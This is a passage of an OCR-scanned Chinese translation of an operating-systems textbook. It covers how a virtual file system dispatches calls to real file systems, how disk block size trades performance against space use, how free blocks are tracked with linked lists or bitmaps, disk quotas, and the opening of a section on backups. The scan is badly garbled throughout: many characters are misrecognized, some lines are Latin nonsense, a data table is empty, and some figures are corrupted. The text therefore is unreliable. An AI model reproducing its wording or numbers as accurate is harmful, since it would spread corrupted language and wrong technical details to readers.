NFS (Network File System， 网 络 文件 系统 ) 协议 的 远程 文件 系统 。VFS 
设计 是 只 要 实际 的 文件 系统 提供 VFS 需 要 的 功能 ，VFS 就 不 需 知道 或 者 
关心 数据 具体 存储 在 什么 地 方 或 者 底层 的 文件 系统 是 什么 样 的 。 








大 多 数 VFS 应 用 本 质 上 都 是 面向 对 象 的 ， 即 便 它们 用 C 语 言 而 不 是 
C++ 编 写 。 有 几 种 通常 支持 的 主要 的 对 象 类 型 ， 包 括 超 块 (描述 文件 系 
统 ) 、v 节 点 《 撞 述 文件 ) 和 目录 描述 文件 系统 目录 ) 。 这 些 中 的 每 
一 个 都 有 实际 文件 系统 必须 支持 的 相关 操作 。 男 外 ，VFS 有 一 些 供 它 自 
己 使 用 的 内 部 数据 结构 ， 包 括 用 于 跟 踩 用 户 进程 中 所有 打开 文件 的 装载 
表 和 文件 描述 符 的 数组 。 


为 了 理解 VFS 是 如 何 工 作 的 ， 让 我 们 按时 间 的 先后 举 一 个 例子 。 妆 
系统 启动 时 ， 根 文件 系统 在 VFS 中 注册 。 男 外 ， 当 装载 其 他 文件 系统 
时 ， 不 省 在 局 动 时 还 是 在 操作 过 程 中 ， 它 们 也 必须 在 VFS 中 注册 。 当 一 





个 文件 系统 注册 时 ， 它 做 的 最 基本 的 工作 就 是 提供 一 个 包 仿 VFS 所 需要 
的 函数 地 址 的 列表 ， 可 以 是 一 个 长 的 调用 天 量 〈 表 ) ， 或 者 是 许多 这 样 
的 矢量 (如 果 VFS 需 要 ) ， 每 个 VFS 对 象 一 个 。 因 此 ， 只 要 一 个 文件 系 
统 在 VFS 注 册 ，VFS 束 知道 如 何 从 它 那 里 读 一 个 块 一 一 它 从 文件 系统 提 
供 的 矢量 中 直接 调用 第 4 个 (或 者 任何 一 个 ) 功能 。 同 样 地 ，VFS 也 知 
道 如 何 执行 实际 文件 系统 提供 的 每 一 个 其 他 的 功能 : 它 只 需 调 用 东 个 功 
能 ， 该 功能 所 在 的 地 址 在 文件 系统 注册 时 瓯 提 供 了 。 


装载 文件 系统 后 就 可 以 使 用 它 了 。 比 如 ， 如 果 一 个 文件 系统 装载 
在 /usr 并 且 一 个 进程 调用 它 : 


open ("/usr/include/unistd.h",0O RDONLY) 





当 解 析 路 径 时 ，VEFS 看 到 新 的 文件 系统 被 装载 在 /usr， 并 且 通 过 搜 
索 已 经 装载 文件 的 超 块 表 来 确定 它 的 超 块 。 做 完 这 些 ， 它 可 以 找到 它 所 
装载 的 文件 的 根 目 录 ， 在 那里 查找 路 径 include/unistdh。 然 后 VFS 创 建 
一 个 v 节 点 并 调用 实际 文件 系统 ， 以 返回 所 有 的 在 文件 i 节 点 中 的 信息 。 
这 个 信息 被 和 其 他 信息 一 起 复制 到 y 节 点 中 《在 RAM 中 ) ， 而 这 些 信息 
中 最 重要 的 是 指向 包含 调用 v 节 点 操作 的 功能 表 的 指针 ， 比 如 read、 


write 和 close 等 。 





当 v 节 点 被 创建 以 后 ，VFS 在 文件 描述 符 表 中 为 调用 进程 创建 一 个 
入 口 ， 并 且 将 它 指 同一 个 新 的 v 节 点 〈 为 了 简单 ， 文 件 描述 符 实 际 上 指 


向 另 一 个 包含 当前 文件 位 置 和 指向 V 节 点 的 指针 的 数据 结构 ， 但 是 这 个 
细节 对 于 我 们 这 里 的 陈述 并 不 重要 ) 。 最 后 ，VFS 向 调用 者 返回 文件 描 
述 符 ， 所 以 调用 者 可 以 用 它 去 读 、 写 或 者 天 闭 文件 。 


随后 ， 当 进程 用 文件 描述 符 进 行 一 个 读 操 作 ，VFS 通 过 进程 表 和 文 
件 描述 符 表 确定 Y 节 点 的 位 置 ， 并 跟随 指针 指 回 功 能 表 〈 所 有 这 些 都 是 
被 请 求 文件 所 在 的 实际 文件 系统 中 的 地 址 ) 。 这 样 就 调用 了 处 理 read 的 
功能 ， 在 实际 文件 系统 中 的 代码 运行 并 得 到 所 请 求 的 块 。VFS 并 不 知道 
数据 是 来 源 于 本 地 硬盘 ， 还 是 来 源 于 网 络 中 的 远程 文件 系统 、CD- 
ROM、USB 存 储 棒 或 者 其 他 介质 。 所 有 有 关 的 数据 结构 在 图 4-19 中 展 
示 。 从 调用 者 进程 号 和 文件 描述 符 开 始 ， 进 而 是 v 节 点 ， 读 功能 指针 ， 
然后 是 对 实际 文件 系统 的 入 口 函 数 定位 。 











图 4-19 VFS 和 实际 文件 系统 进行 读 操 作 所 使 用 的 数据 结构 和 代码 的 
简化 视图 


通过 这 种 方法 ， 加 入 新 的 文件 系统 变 得 相当 直接 。 为 了 加 入 一 个 文 
件 系统 ， 设 计 者 首先 获得 一 个 VFS 期 待 的 功能 调用 的 列表 ， 然 后 编写 文 
件 系 统 实现 这 些 功 能 。 或 者 ， 如 果 文 件 系 统 已 经 存在 ， 它 们 必须 提供 
VFS 需 要 的 包 六 功能 ， 通 常 通过 建造 一 个 或 者 多 个 内 在 的 指向 实际 文件 
系统 的 调用 来 实现 。 





4.4 文件 系统 管理 和 优化 


要 使 文件 系统 工作 是 一 件 事 ， 使 真实 世界 中 的 文件 系统 有 效 、 鲁 棒 
地 工作 是 男 一 回 事 。 本 节 中 ， 我 们 将 考察 有 关 管 理 磁盘 的 一 些 问题 。 





4.4.1 ”磁盘 空间 管理 








文件 通常 存放 在 磁盘 上 ， 所 以 对 磁盘 空间 的 管理 是 系统 设计 者 要 考 
虑 的 一 个 主要 问题 。 存 储 n 个 字 节 的 文件 可 以 有 两 种 全 上 略 ; 分 配 n 个 字 市 
的 连续 磁盘 空间 ， 或 者 把 文件 分 成 很 多 个 连续 (或 并 不 一 定 连 续 ) 的 
块 。 在 存储 管理 系统 中 ， 分 段 处 理 和 分 页 处 理 之 间 也 要 进行 同样 的 权 


衡 。 





正如 我 们 已 经 见 到 的 ， 按 连续 字 市 序列 存储 文件 有 一 个 明显 问题 ， 
当 文 件 扩大 时 ， 有 可 能 需要 在 磁盘 上 移动 文件 。 内 存 中 分 段 也 有 同样 的 
问题 。 不 同 的 是 ， 相 对 于 把 文件 从 磁盘 的 一 个 位 置 移动 到 为 一 个 位 置 ， 
内 存 中 段 的 移动 操作 要 快 得 多 。 因 此 ， 几 乎 所 有 的 文件 系统 都 把 文件 分 
割 成 固定 大 小 的 块 来 存储 ， 各 英之 间 不 一 定 相 邻 。 








1. 块 大 小 





一 旦 决定 把 文件 按 固 定 大 小 的 块 来 存储 ， 束 会 出 现 一 个 问题 ， 块 的 


大 小 应 该 是 多 少 ? 按照 磁盘 组 织 方式 ， 忆 区 、 和 磁道 和 柱 面 显然 都 可 以 作 
为 分 配 单位 (虽然 它们 都 与 设备 相关 ， 这 是 一 种 负面 因素 〉。 在 分 页 系 
统 中 ， 页 面 大 小 也 是 主要 讨论 的 问题 之 一 。 





拥有 大 的 块 尺寸 意味 大 每 个 文件 ， 甚 至 一 个 1 字 节 的 文件 ， 痢 要 占 
用 一 整个 柱 面 ， 也 束 是 说 小 的 文件 浪费 了 大 量 的 磁 副 空间 。 故 一 方面 ， 
小 的 块 尺寸 意味 看 大 多 数 文 件 会 跨越 多 个 块 ， 因 此 需要 多 次 寻 道 与 旋转 
延迟 才能 读 出 它们 ， 从 而 降低 了 性 能 。 因 此 ， 如 果 分 配 的 单元 太 大 ， 则 
浪费 了 空间 ; WRR, WIR BEN TA. 





做 出 一 个 好 的 决策 需要 知道 有 关 文 件 大 小 分 配 的 信息 。Tanenbaum 
SA (2006) 给 出 了 1984 年 及 2005 年 在 一 所 大 型 研究 型 大 学 (VU) 的 
计算 机 系 以 及 一 个 政治 网 站 (www.electoral-vote.com) 的 商业 网 络 服务 
器 上 研究 的 文件 大 小 分 配 数据 。 结 果 显 示 在 图 4-20， 其 中 ， 对 于 每 个 2 
的 窘 文件 大 小 ， 在 3 个 数据 集 里 每 一 数据 集中 的 所 有 小 于 等 于 这 个 值 的 
文件 所 占 的 百分比 被 列 了 出 来 。 例 如 ， 在 2005 年 ，59.13% 的 VU 的 文件 
是 4KB 或 更 小 ， 且 90.84% 的 文件 是 64KB 或 更 小 ， 其 文件 大 小 的 中 间 值 
是 2475 字 节 。 一 些 人 可 能 会 因为 这 么 小 的 尺寸 而 感到 吃惊。 








| 文件 大 小 | vu 1984 | vu 2005 














































































































图 4-20 小 于 茶 个 给 定 值 〈 字 节 ) 的 文件 的 百分比 


我 们 能 从 这 些 数 据 中 得 出 什么 结论 呢 ? 如 果 块 大 小 是 IKB， 则 只 有 
30% 一 50% 的 文件 能 够 放 在 一 个 块 内 ， 但 如 果 块 大 小 是 4KB， 这 一 比例 
将 上 升 到 60% 一 70%。 那 篇 论文 中 的 其 他 数据 显示 ， 如 果 块 大 小 是 
4KB， 则 93% 的 磁盘 块 会 被 10% 最 大 的 文件 使 用 。 这 意味 着 在 每 个 小 文 
件 末 尾 浪费 一 些 空间 几乎 不 会 有 任何 关系 ， 因 为 磁盘 被 少量 的 大 文件 
《视频 ) 给 占用 了 ， 并 且 小 文件 所 占 空间 的 总 量 根本 就 无 关 紧 要 ， 甚 至 
将 那 90% 最 小 的 文件 所 占 的 空间 翻 一 倍 也 不 会 引 人 注 目 。 








忆 一 方面 ， 分 配 单 位 很 小 意味 着 每 个 文件 由 很 多 块 组 成 ， 每 读 一 块 
都 有 寻 道 和 旋转 延迟 时 间 ， 所 以 ， 读 取 由 很 多 小 块 组 成 的 文件 会 非常 


慢 。 


举例 说 明 ， 假 设 磁盘 每 道 有 1MB， 其 旋转 时 间 为 8.33ms， 平 均 寻 道 
ITA] y5ms. AÆ (ms) 为 单位 ， 读 取 一 个 k 个 字 市 的 块 所 圾 要 的 时 
间 是 寻 道 时 间 、 旋 转 延迟 和 传送 时 间 之 和 : 


5+4.165+(k/1 000 000)x8.33 


图 4-21 的 虚线 表示 一 个 磁盘 的 数据 率 与 块 大 小 之 间 的 函数 关系 。 要 
计算 空间 利用 率 ， 则 要 对 文件 的 平均 大 小 做 出 假设 。 为 简单 起 见 ， 假 设 
所 有 文件 都 是 4KB。 尽 管 这 个 数据 稍微 大 于 在 VU 测 量 得 到 的 数据 ， 但 
是 学 生 们 大 概 应 该 有 比 公司 数据 中 心 更 小 的 文件 ， 所 以 这 样 整 体 上 也 许 
更 好 些 。 图 4-21 中 的 实 线 表示 作为 盘 块 大 小 函数 的 空间 利用 率 。 
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图 4-21 BR (左边 标 度 ) 给 出 磁盘 数据 率 ， 实 线 (右边 标 度 ) 给 出 
磁盘 空间 利用 率 〈 所 有 文件 大 小 均 为 4KB) 


可 以 按 下 面 的 方式 理解 这 两 条 曲线 。 对 一 个 块 的 访问 时 间 完 全 由 寻 
道 时间 和 旋转 延迟 所 决定 ， 所 以 徊 要 花费 9ms 的 代价 访问 一 个 盘 块 ， 那 
么 取 的 数据 越 多 越 好 。 因 此 ， 数 据 率 随 独 磁 盘 块 的 增 大 而 增 大 《直到 传 
输 花 费 很 长 的 时 间 以 至 于 传输 时 间 成 为 主导 因素 〉。 





现在 考虑 空间 利用 率 。 对 于 4KB 文 件 和 1KB、2KB 或 4KB 的 磁盘 
块 ， 分 别 使 用 4、2、1 块 的 文件 ， 没 有 浪费 。 对 于 8KB 块 以 及 4KB 文 
件 ， 空 间 利用 率 降 至 50%， 而 16KB 块 则 降 至 25%。 实 际 上 ， 很 少 有 文件 
的 大 小 是 磁盘 块 整数 倍 的 ， 所 以 一 个 文件 的 最 后 一 个 磁盘 块 中 总 是 有 一 
些 空间 浪费 。 


然而 ， 这 些 曲线 显示 出 性 能 与 空间 利用 率 天 生 就 是 矛盾 的 。 小 的 块 
会 导致 低 的 性 能 但 是 高 的 空间 利用 率 。 对 于 这 些 数据 ， 不 存在 合理 的 折 
中 方案 。 在 两 条 曲线 的 相交 处 的 大 小 大 约 是 64KB， 但 是 数据 (传输 ) 
速率 只 有 6.6MB/s 并 且 空 间 利用 率 只 有 大 约 7%， 两 者 都 不 是 很 好 。 从 历 
史 观 点 上 来 说 ， 文 件 系 统 将 大 小 设 在 1 一 4KB 之 间 ， 但 现在 随 着 磁盘 超 
过 了 1TB， 还 是 将 块 的 大 小 提升 到 64KB 并 且 接 受 浪 费 的 磁盘 空间 ， 这 样 
也 许 更 好 。 磁 盘 空 间 几 乎 不 再 会 短缺 了 。 








在 考察 Windows NT 的 文件 使 用 情况 是 否 与 UNIX 的 文件 使 用 情况 存 
在 微小 差别 的 实验 中 ，Vogels 在 康 奈 尔 大 学 对 文件 进行 了 测量 
(Vogels, 1999) 。 他 观察 到 NT 的 文件 使 用 情况 比 UNIX 的 文件 使 用 情 
况 复 杂 得 多 。 他 写 道 : 


当 我 们 在 notepad 文 本 编辑 器 中 输入 一 些 字符 后 ， 将 内 容 保存 到 一 个 
文件 中 将 触发 26 个 系统 调用 ， 包 括 3 个 失败 的 open 企 图 、1 个 文件 重 写 和 
4 个 打开 和 关闭 序列 。 


尽管 如 此 ， 他 观察 到 了 文件 大 小 的 中 间 值 〈 以 使 用 情况 作为 权 
Æ): 只 读 的 为 IKB， 只 写 的 为 2.3KB， 读 写 的 文件 为 4.2KB。 考 虑 到 数 
据 集 测 量 技术 以 及 年 份 上 的 差异 ， 这 些 结果 与 VU 的 结果 是 相当 吻合 
的 。 


2. 记 录 空 闲 块 


一 且 选 定 了 块 大 小 ， 下 一 个 问题 就 是 怎样 跟踪 空闲 块 。 有 两 种 方法 
被 广泛 采用 ， 如 图 4-22 所 示 。 第 一 种 方法 是 采用 磁盘 块 链表 ， 每 个 块 中 
包含 尽 可 能 多 的 空闲 磁盘 块 号 。 对 于 1IKB 大 小 的 块 和 32 位 的 磁盘 块 号 ， 

空闲 表 中 每 个 块 包含 有 255 个 空闲 块 的 块 号 《需要 有 一 个 位 置 存放 指 辐 
下 一 个 块 的 指针 ) 。 考 虑 500GB 的 磁盘 ， 拥 有 488x108 个 块 。 为 了 在 255 
块 中 存放 全 部 这 些 地 址 ， 需 要 190 万 个 块 。 通 常情 况 下 ， 采 用 空闲 块 存 
放空 闪 表 ， 这 样 存储 器 基本 上 是 空 的 。 





空 亲 磁盘 块 16 17, 18 
















1100100011101111 


Lo111011101110111 | 
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1 KB 的 磁盘 块 可 以 保存 位 图 
256 个 32 位 磁盘 块 号 





a) b) 


图 4-22 a) 把 空闲 表 存 放 在 链表 中 ; b) 位 图 


另 一 种 空闲 磁盘 空间 管理 的 方法 是 采用 位 图 。n 个 块 的 磁盘 需要 n 位 
位 图 。 在 位 图 中 ， 空 闲 块 用 1 表示 ， 已 分 配 块 用 0 表示 〈 或 者 反之 ) 。 对 
于 500GB 磁 盘 的 例子 ， 需 要 488x106 位 表示 ， 即 需要 60 000 个 1KB 块 存 
储 。 很 明显 ， 位 图 方法 所 需 空间 较 少 ， 因 为 每 块 只 用 一 个 二 进 制 位 标 
识 ， 相 反 在 链表 方法 中 ， 每 一 块 要 用 到 32 位 。 只 有 在 磁盘 快 满 时 〈 即 几 
乎 没有 空闲 块 时 ) 链表 方案 需要 的 块 才 比 位 图 少 。 








如 果 空 闲 块 倾向 于 成 为 一 个 长 的 连续 分 块 的 话 ， 则 空闲 列表 系统 可 
以 改 成 记录 分 块 而 不 是 单个 的 块 。 一 个 8、16、32 位 的 计数 可 以 与 每 一 


个 块 相关 联 ， 来 记录 连续 空闲 块 的 数目 。 在 最 好 的 情况 下 ， 一 个 基本 上 
空 的 磁盘 可 以 用 两 个 数 表 达 : 第 一 个 空闲 块 的 地 址 ， 以 及 空闲 块 的 计 
数 。 丸 一 方面 ， 如 果 磁 盘 产 生 了 很 严重 的 碎片 ， 记 录 分 块 会 比 记 录 单 独 
的 块 效率 要 低 ， 因 为 不 仅 要 存储 地 址 ， 而 且 还 要 存储 计数 。 


这 个 情形 说 明了 操作 系统 设计 者 经 常 遇 到 的 一 个 问题 。 有 许多 数据 
结构 与 算法 可 以 用 来 解决 一 个 问题 ， 但 选择 其 中 最 好 的 则 需要 数据 ， 而 
这 些 数据 是 设计 者 无 法 预先 拥有 的 ， 只 有 在 系统 被 部 署 完 毕 并 被 大 量 使 
用 后 才 会 获得 。 更 有 甚 者 ， 有 些 数据 可 能 就 是 无 法 获取 。 例 如 ，1984 年 
与 1995 年 我 们 在 VU 测 量 的 文件 大 小 、 网 站 的 数据 以 及 在 康 茶 尔 大 学 的 
数据 ， 是 仅 有 的 4 个 数据 样本 。 尽 管 有 总 比 什么 都 没有 好 ， 我 们 仍旧 不 
清楚 是 人 否 这 些 数据 也 可 以 代表 家 用 计算 机 、 公 司 计算 机 、 政 府 计 算 机 及 
其 他 。 经 过 一 些 努 力 我 们 也 许可 以 获取 一 些 其 他 种 类 计算 机 的 样本 ， 但 
即使 那样 ，《 融 攒 这 些 数据 来 ) 推 有 那 种 训 量 适 用 于 所 有 计算 机 也 是 是 
dal) o 











现在 回 到 空闲 表 方 法 ， 只 需要 在 内 存 中 保存 一 个 指针 块 。 当 文件 创 
建 时 ， 所 需要 的 块 从 指针 块 中 取出 。 现 有 的 指针 块 用 完 时 ， 从 磁盘 中 读 
入 一 个 新 的 指针 块 。 类 似 地 ， 当 删除 文件 时 ， 其 磁盘 块 被 释放 ， 并 添加 
到 内 存 的 指针 块 中 。 当 这 个 块 填 满 时 ， 就 把 它 写 入 磁盘 。 


在 菏 些 特定 情形 下 ， 这 个 方法 产生 了 不 必要 的 磁盘 WO。 考虑 图 4- 
23a 中 的 情形 ， 内 存 中 的 指针 块 只 有 两 个 表 项 了 。 如 果 释 放 了 一 个 有 三 


个 磁盘 块 的 文件 ， 该 指针 块 就 溢出 了 ， 必 须 将 其 写 入 磁盘 ， 这 承 产生 了 
图 4-23b 的 情形 。 如 果 现 在 写 入 含有 三 个 块 的 文件 ， 满 的 指针 块 不 得 不 
再 次 读 入 ， 这 将 回 到 图 4-23a 的 情形 。 如 果 有 三 个 块 的 文件 只 是 作为 临 
时 文件 被 号 入 ， 当 它 被 释放 时 ， 就 需要 另 一 个 磁盘 写 操作 ， 以 便 把 满 的 
指针 块 写 回 磁 盘 。 总 之 ， 当 指针 块 几 乎 为 空 时 ， 一 系列 短期 的 临时 文件 
就 会 引起 大 量 的 磁盘 IO。 


We tt 
内 存 f 
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图 4-23 aA AAP Aita e SA EER ISUPER, VA 
及 磁盘 上 三 个 指针 块 ; b) 释 放 一 个 有 三 个 块 的 文件 的 结果 ; 9 处 理 该 三 
个 块 的 文件 的 替代 策略 ( 带 阴 影 的 表 项 代表 指向 空闲 磁盘 块 的 指针 ) 


一 个 可 以 避免 过 多 磁盘 VO 的 丛 代 集 略 是 ， 拆 分 满 了 的 指针 块 。 这 
样 ， 当 释放 三 个 块 时 ， 不 再 是 从 图 4-23a 变 化 到 图 4-23b， 而 是 从 图 4-23a 
变化 到 图 4-23c。 现 在 ， 系 统 可 以 处 理 一 系列 临时 文件 ， 而 不 需 进 行 任 
何 磁盘 IO。 如 果 内 存 中 指针 英 满 了 ， 就 写 入 磁盘 ， 半 满 的 指针 块 从 磁 
盘 中 读 入 。 这 里 的 思想 是 : 保持 磁盘 上 的 大 多 数 指针 块 为 满 的 状态 〈 减 


少 磁盘 的 使 用 ) ， 但 古 在 内 存 中 保留 一 个 半 满 的 指针 块 。 这 样 ， 它 可 以 
既 处 理 文件 的 创建 又 同时 处 理 文件 的 删除 操作 ， 而 不 会 为 空 采 表 进 行 破 


盘 I/O。 


对 于 位 图 ， 在 内 存 中 只 保留 一 个 块 是 有 可 能 的 ， 只 有 在 该 块 满 了 或 
空 了 的 情形 下 ， 才 到 磁盘 上 取 男 一 块 。 这 样 处 理 的 附加 好 处 是 ， 通 过 在 
位 图 的 单一 块 上 进行 所 有 的 分 配 操作 ， 人 磁盘 块 会 较为 紧密 地 聚集 在 一 
起 ， 从 而 减少 了 磁盘 臂 的 移动 。 由 于 位 图 是 一 种 固定 大 小 的 数据 结构 ， 
所 以 如 果 内 核 是 (部 分 ) 分 页 的 ， 就 可 以 把 位 图 放 在 虚拟 内 存 内 ， 在 需 
要 时 将 位 图 的 页 面 调 入 。 


3. 人 磁盘 配 额 





为 了 防止 人 们 贷 心 而 占有 太 多 的 磁盘 空间 ， 多 用 户 操 作 系 统 常 第 提 
供 一 种 强制 性 磁盘 配额 机 制 。 其 思想 是 系统 管理 员 分 给 每 个 用 户 拥有 文 
件 和 块 的 最 大 数量 ， 操 作 系 统 确保 每 个 用 户 不 超过 分 给 他 们 的 配额 。 下 
面 将 介绍 一 种 典型 的 机 制 。 


当 用 户 打开 一 个 文件 时 ， 系 统 找到 文件 属性 和 磁盘 地 址 ， 并 把 它们 
送 入 内 存 中 的 打开 文件 表 。 其 中 一 个 属性 告诉 文件 所 有 者 是 谁 。 任 何 有 
关 该 文件 大 小 的 增长 部 记 到 所 有 者 的 配额 上 。 


第 二 张 表 包含 了 每 个 用 户 当 前 打开 文件 的 配额 记录 ， 即 使 是 其 他 人 
打开 该 文件 也 一 样 。 这 张 表 如 图 4-24 所 示 ， 该 表 的 内 容 是 从 被 打开 文件 


的 所 有 者 的 磁盘 配额 文件 中 提取 出 来 的 。 当 所 有 文件 关闭 时 ， 该 记录 被 
写 回 配额 文件 。 


属性 软 块 限制 


磁盘 地 址 硬块 限制 
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图 4-24 在 配额 表 中 记录 了 每 个 用 户 的 配额 


当 在 打开 文件 表 中 建立 一 新 表 项 时 ， 会 产生 一 个 指向 所 有 者 配额 记 
录 的 指针 ， 以 便 很 容易 找到 不 同 的 限制 。 每 一 次 往 文件 中 添加 一 块 时 ， 
文件 所 有 者 所 用 数据 块 的 总 数 也 增加 ， 引 发 对 配额 硬 限制 和 软 限制 检 
但 。 可 以 超出 软 限制 ， 但 硬 限制 不 可 以 超出 。 当 已 达到 便 限制 时 ， 再 往 
文件 中 添加 内 容 将 引发 错误 。 同 时 ， 对 文件 数目 也 存在 着 类 似 的 检查 。 











当 用 户 试图 登录 时 ， 系 统 核查 配额 文件 ， 碍 看 该 用 户 文件 数目 或 磁 
盘 块 数目 是 人 否 超过 软 限 制 。 如 果 超 过 了 任 一 限制 ， 则 显示 一 个 警告 ， 保 


存 的 警告 计数 减 1。 如 果 该 计数 已 为 0， 表 示 用 户 多 次 忽略 该 警告 ， 因 而 
将 不 允许 该 用 户 登录 。 要 想 再 得 到 登录 的 许可 ， 就 必须 与 系统 管理 员 协 
商 。 








这 一 方法 具有 一 种 性 质 ， 即 只 要 用 户 在 退出 系统 前 消除 所 超过 的 部 
分 ， 他 们 就 可 以 在 一 次 终端 会 话 期 间 超过 其 软 限制 ， 但 无 论 什 么 情况 下 
都 不 能 超过 硬 限制 。 





44.2 ”文件 系统 备份 


比 起 计算 机 的 损坏 ， 文 件 系 统 的 破坏 往往 要 精 糕 得 多 。 如 有 果 由 于 火 
灾 、 内 电 电 流 或 者 一 杯 咖啡 泼 在 键盘 上 而 和 弄 坏 了 计算 机 ， 确 实 让 人 伤 透 
脑筋 ， 而 且 又 要 花 上 一 笔 钱 ， 但 一 般 而 言 ， 更 换 非常 方便 。 只 要 去 计算 
机 商店 ,便宜 的 个 人 计算 机 在 短 短 一 个 小 时 之 内 就 可 以 更 换 (当然 ， 如 
果 这 发 生 在 大 学 里 面 ， 则 发 出 订单 需 3 个 委员 会 的 同意 ，5 个 签字 要 化 90 
天 的 时 间 ) 。 








不 管 是 硬件 或 软件 的 故障 ， 如 果 计 算 机 的 文件 系统 被 破坏 了 ， 人 恢复 
全 部 信息 会 是 一 件 困 难 而 又 费时 的 工作 ， 在 很 多 情况 下 ， 是 不 可 能 的 。 
对 于 那些 丢失 了 程序 、 文 档 、 客 户 文件 、 税 收 记 录 、 数 据 库 、 市 场 计划 
或 者 其 他 数据 的 用 户 来 次， 这 不 赣 为 一 次 大 的 灾难 。 尽 管 文 件 系统 无 法 
防止 设备 和 介质 的 物理 损坏 ， 但 它 至 少 应 能 保护 信息 。 直 接 的 办 法 是 制 
作 备份 。 但 是 备份 并 不 如 想象 得 那么 简单 。 让 我 们 开始 考察 。 





许多 人 痢 认 为 不 值得 把 时 间 和 精力 花 在 备份 文件 这 件 事 上 ， 直 到 某 
一 天 磁盘 突然 月 证 ， 他 们 才 意 识 到 事态 的 严重 性 。 不 过 现在 很 多 公司 都 
意识 到 了 数据 的 价值 ， 常 剃 把 数据 转 到 磁 市 上 和 存储， 并且 每 天 至 少 做 一 
次 备份 。 现 在 磁带 的 容量 大 至 几 十 甚至 几 百 GB， 而 每 个 GB 仅 仅 需 要 几 
美 分 。 其 实 ， 做 备份 并 不 像 人 们 说 得 那么 烦琐 ， 现 在 融 让 我 们 来 看 一 下 











相关 的 要 后 。 
做 磁带 备份 主要 是 要 处 理 好 两 个 潜在 问题 中 的 一 个 : 
1) 从 意外 的 灾难 中 恢复 。 
2) 从 错误 的 操作 中 恢复 。 


第 一 个 问题 主要 是 由 磁盘 破裂 、 火 灾 、 洪 水 等 自然 灾害 引起 的 。 事 
实 上 这 些 情 形 并 不 多 见 ， 所 以 许多 人 也 束 不 以 为 然 。 这 些 人 往往 也 是 以 
同样 的 原因 忽略 了 自家 的 火灾 保险 。 





第 二 个 原因 主要 是 用 户 意 外 地 删除 了 原本 还 需要 的 文件 。 这 种 情况 
发 生得 很 频繁 ， 使 得 windows 的 设计 者 们 针对 “删除 ”命令 专门 设计 了 特 
殊 目录 一 一 回收 站 ”， 也 就 是 说 ， 在 人 们 删除 文件 的 时 候 ， 文 件 本 里 并 
不 真正 从 磁盘 上 消失 ， 而 是 被 放置 到 这 个 特殊 目录 下 ， 竺 以 后 需要 的 时 
候 可 以 还 原 回 去 。 文 件 备份 更 主要 是 指 这 种 情况 ， 这 就 允许 几 天 之 前 ， 
甚至 儿 个 星期 之 前 的 文件 都 能 从 原来 备份 的 磁带 上 还 原 。 











为 文件 做 备份 既 耗 时 间 又 费 空间 ， 所 以 需要 做 得 又 快 义 好 ， 这 一 扣 
很 重要 。 基 于 上 述 考 虑 我 们 来 看 看 下 和 面 的 问题 。 首 先 ， 是 要 备份 整个 文 
件 系统 还 是 仅 备 份 一 部 分 呢 ? 在 许多 安装 配置 中 ， 可 执行 程序 〈 二 进 制 
代码 ) 放置 在 文件 系统 树 的 受 限 制 部 分 ， 所 以 如 果 这 些 文件 能 直接 从 广 
丙 提供 的 CD-ROM 盘 上 重新 安装 的 话 ， 也 就 没有 必要 为 它们 做 备份 。 此 








外 ， 多 数 系 统 都 有 专门 的 临时 文件 目录 ， 这 个 目录 也 不 需要 备份 。 在 
UNIX 系 统 中 ， 所 有 的 特殊 文件 〈 也 就 是 IO 设备 ) 都 放置 在 /dev 目 录 
下 ， 对 这 个 目录 做 备份 不 仅 没有 必要 而 且 还 十 分 危险 一 一 因为 一 旦 进行 
备份 的 程序 试图 读 取 其 中 的 文件 ， 备 份 程序 就 会 永久 挂 起 。 简 而 言 之 ， 
合理 的 做 法 是 只 备份 特定 目录 及 其 下 的 全 部 文件 ， 而 不 是 备份 整个 文件 
系统 。 


其 次 ， 对 前 一 次 备份 以 来 没有 更 改过 的 文件 再 做 备份 是 一 种 浪费 ， 
因而 产生 了 增 量 转 储 的 思想 。 最 简单 的 增 量 转 储 形 式 就 是 周期 性 地 《每 
周一 次 或 每 月 一 次 ) 做 全 面 的 转 储 (备份 )， 而 每 天 只 对 当天 更 改 的 数 
据 做 备份 。 稍 微 好 一 点 的 做 法 只 备份 目 最 近 一 次 转 储 以 来 更 改过 的 文 
件 。 当 然 了 ， 这 种 做 法 极 大 地 缩减 了 转 储 时 间 ， 但 操作 起 来 却 更 复杂 ， 
因为 最 近 的 全 面 转 储 先 要 全 部 恢复 ， 随 后 按 逆 序 进行 增 量 转 储 。 为 了 方 
便 ， 人 们 往往 使 用 更 复杂 的 增 量 转 储 模式 。 








第 三 ， 既 然 竺 转 储 的 往往 是 海量 数据 ， 那 么 在 将 其 写 入 磁带 之 前 对 
文件 进行 压缩 就 很 有 必要 。 可 是 对 许多 压缩 算法 而 言 ， 备 份 磁带 上 的 单 
个 坏 点 就 能 破坏 解压 缩 算法 ， 并 导致 整个 文件 其 全 整个 磁带 无 法 阅读 。 
所 以 是 否 要 对 备份 文件 流 进 行 压缩 必须 慎重 考虑 。 

第 四 ， 对 活动 文件 系统 做 备份 征 很 难 的 。 因 为 在 转 储 过 程 中 添加 、 


删除 或 修改 文件 和 目录 可 能 会 导致 文件 系统 的 不 一 致 性 。 不 过 ， 既 然 转 
储 一 次 需要 几 个 小 时 ， 那 么 在 晚上 大 部 分 时 间 让 文件 系统 脱 机 是 很 有 必 


要 的 ， 昌 然 这 种 做 法 有 时 会 令 人 难以 接受 。 正 因 如 此 ， 人 们 修改 了 转 储 
算法 ， 记 下 文件 系统 的 瞬时 状态 ， 即 复制 关键 的 数据 结构 ， 然 后 需要 把 
将 来 对 文件 和 目录 所 做 的 修改 复制 到 块 中 ， 而 不 是 处 处 更 新 它们 
CHutchinson 等 人 ，1999) 。 这 样 ， 文 件 系 统 在 抓 取 快照 的 时 候 就 被 有 
效 地 冻结 了， 留待 以 后 空间 时 再 备份 。 


第 五 ， 即 最 后 一 个 问题 ， 做 备份 会 给 一 个 单位 引入 许多 非 技 术 性 问 
题 。 如 采 当 系统 管理 员 下 楼 去 取 打 印 文件 ， 而 坚 无 防备 地 把 备份 磁带 搁 
罩 在 办 公 室 里 的 时 候 ， 就 是 世界 上 最 棒 的 在 线 保 安 系 统 也 会 失去 作用 。 
这 时 ， 一 个 间谍 所 要 做 的 只 是 潜入 办 公 室 、 将 一 个 小 磁带 放 入 口袋 ， 然 
后 绅士 般 地 离开 。 再 见 吧 保 安 系 统 。 即 使 每 天 都 做 备份 ， 如 果 倍 上 一 场 
大 火烧 光 了 计算 机 和 所 有 的 备份 磁带 ， 那 做 备份 又 有 什么 意义 呢 ? 由 于 
